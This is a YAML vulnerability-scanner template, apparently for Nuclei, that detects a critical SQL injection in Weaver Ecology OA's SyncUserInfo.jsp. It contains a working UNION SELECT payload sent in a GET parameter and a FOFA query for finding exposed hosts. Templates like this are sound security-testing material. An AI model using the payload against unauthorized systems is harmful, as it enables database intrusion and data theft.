id: ecology-syncuserinfo-sqli

info:
  name: Ecology Syncuserinfo - SQL Injection
  author: ritikchaddha
  severity: critical
  description: Ecology Syncuserinfo contains a SQL injection vulnerability via a GET request. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
  reference:
    - https://www.weaver.com.cn/
    - https://github.com/chaitin/xray/blob/master/pocs/ecology-syncuserinfo-sqli.yml
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cwe-id: CWE-89
  metadata:
    max-request: 1
    fofa-query: app="泛微-协同办公OA"
  tags: ecology,sqli

http:
  - method: GET
    path:
      - "{{BaseURL}}/mobile/plugin/SyncUserInfo.jsp?userIdentifiers=-1)union(select(3),null,null,null,null,null,str(98989*44313),null"

    host-redirects: true
    max-redirects: 2

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "4386499557"

      - type: status
        status:
          - 200

# digest: 4a0a0047304502207c7fdd7332a97f18ef506df96a746a9b815d76ae5c170f26537e3194eb09e907022100ad8b614f3075221e0152d3b945f6685ece46e871c092f46f7e01bec6a6be1dc4:922c64590222798bb761d5b6d8e72950
